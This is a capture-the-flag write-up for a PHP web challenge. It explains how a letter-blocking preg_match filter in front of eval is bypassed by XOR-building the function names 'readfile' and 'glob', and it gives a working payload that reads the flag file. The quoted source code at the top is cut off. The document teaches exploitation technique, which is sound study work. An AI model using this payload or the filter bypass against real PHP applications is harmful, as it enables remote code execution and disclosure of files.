Tags: web php webshell
Rating:
# Web Warm-up
We are given a link to <http://69.90.132.196:5003/?view-source>
It leads us to a webpage with this content
```php
) we get to know that the provided regular expression checks for any alphabets present in the provided string(that would be the value of the $_GET['warmup'] parameter in this case).
Lets evaluate the preg_match expression in a php interpreter.
```bash
bash => php -a
Interactive mode enabled
php > echo preg_match('/[A-Za-z]/is', "abcd");
1
php > echo preg_match('/[A-Za-z]/is', "1234");
0
```
So if we want our input to be executed, our input must not contain any alphabets and should be less that 60 characters in length.
## Developing the exploit
[This](https://ctf-wiki.github.io/ctf-wiki/web/php/php/#preg_match-code-execution) link contains some information on preg_match check bypassing. The above reference explains a few things about PHP.
1. XORing strings in PHP
2. '_' variables
3. Calling functions through strings
By understanding these concepts, we can understand that we can construct strings through XORing other strings and call PHP functions through those strings.
The desired function call we would like to make is
```php
eval("readfile('flag.php');")
```
But the above won't work because we cannot construct the '.' character without using any alphabets.
So we have to go for a different approach.
```php
eval("readfile(glob('*')[0])") // Assuming that the flag.php is the first file in the directory.
```
Since the function names 'readfile' and 'glob' are the ones containing alphabets, lets construct them by XORing 2 strings which do not contain alphabets.
```php
// ^ stands for XOR
$_="@:>;963:"^"2_______"; // readfile
$__="____"^"830="; // glob
$_($__('*')[0]); // readfile(glob('*'))
```
The final exploit is
```php
$_="@:>;963:"^"2_______";$__="____"^"830=";$_($__('*')[0]);
```
By urlencoding this payload and adding it in the request to the website gives us the flag.
## References
1. <https://ctf-wiki.github.io/ctf-wiki/web/php/php/#preg_match-code-execution>
